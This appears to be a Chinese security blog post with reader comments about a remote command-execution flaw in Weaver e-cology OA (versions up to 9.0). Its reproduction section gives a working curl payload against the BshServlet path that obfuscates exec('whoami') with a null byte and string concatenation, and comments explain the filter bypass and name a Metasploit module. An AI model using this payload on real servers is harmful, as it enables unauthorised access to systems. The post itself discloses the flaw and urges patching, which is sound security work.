AI智能摘要
你是否想过,一个办公系统竟会成为黑客入侵的突破口?泛微OA多版本被曝存在高危命令执行漏洞,攻击者只需构造特定请求,便可远程获取服务器权限,后果不堪设想。本文详细揭示漏洞成因、影响范围及复现过程,带你直击安全防线的致命缺口,每一位系统管理员和技术人员都不可错过。
— AI 生成的文章内容摘要
0x01漏洞描述
泛微OA办公系统是一款协调办公软件。
泛微协同商务软件系统weaver e-cology 8存在命令执行漏洞,攻击者可利用该漏洞获取服务器权限。
0x02漏洞危害
攻击者可以通过精心构造的请求包在受影响版本的泛微OA上进行远程代码执行。
0x03影响范围
泛微 e-cology<=9.0
0x04漏洞复现
访问 http://url/weaver/bsh.servlet.BshServleth 输入 payload 如下:

漏洞路径:/weaver/bsh.servlet.BshServlet exec("whoami") curl http://xx.xx.xx.xx.xx/weaver/bsh.servlet.BshServlet/ -d 'bsh.script=ev al%00("ex"%2b"ec(/"whoami/")");&bsh.servlet.captureOutErr=true&bsh.servlet.outp ut=raw'

泰国 1F
这漏洞听着挺可怕,内网没打补丁的要赶紧排查。
广东省广州市 2F
curl那段payload看着就晦涩,能不能贴个解码后的示例?
浙江省嘉兴市 B1
@ 活力的瀑布 payload解码后大概是 bsh.script=eval(“exec(“whoami”)”) 这样,%2b是加号。
越南 3F
感觉厂商更新太慢了,老版本还在用的公司风险好大。
广东省广州市 4F
我之前运维时也碰过类似BshServlet注入,修起来挺麻烦的,折腾了整整一天。
韩国 5F
这个能拿到root权限吗?文中没说清楚,想知道实际危害范围。
江西省南昌市 6F
有没人实测过Metasploit模块或者现成POC?想复现一下。
北京市 B1
@ Dreamrift Metasploit里好像有现成的模块,exploit/multi/http/weaver_bsh_rce,你可以找找看。
海南省 7F
漏洞利用链讲得还行,但细节上没交代清理痕迹的方法,实战里很关键。
湖北省武汉市 8F
又是老漏洞被翻出来,泛微这类系统要是暴露在公网就危险了,建议内网隔离处理。
浙江省杭州市 9F
谁能解释下payload里的%00和拼接为什么能绕过校验?🤔
广东省广州市番禺区 B1
@ 森林女巫 %00是空字节,脚本引擎解析到这就可能截断,拼接字符串是为了绕过某些关键字的检测。
日本 10F
脚本小子又该出动了。
北京市 B1
@ VelvetShadow 这话说的,懂行啊。
山东省 11F
短评:注意更新补丁,别放在公网。
湖北省武汉市 12F
之前公司内网扫出来过这个,应急响应搞得人仰马翻,还好没被利用。
北京市 13F
这个%00是空字符截断吧?
北京市 B1
@ 酿酒杨 对,就是空字符
印度 14F
这种老系统,特别是政务单位,好多都还在用,打补丁流程长得很。
日本 15F
危害范围肯定不小,能拿到Web服务进程权限,要是权限配置有问题,提权也不是没可能。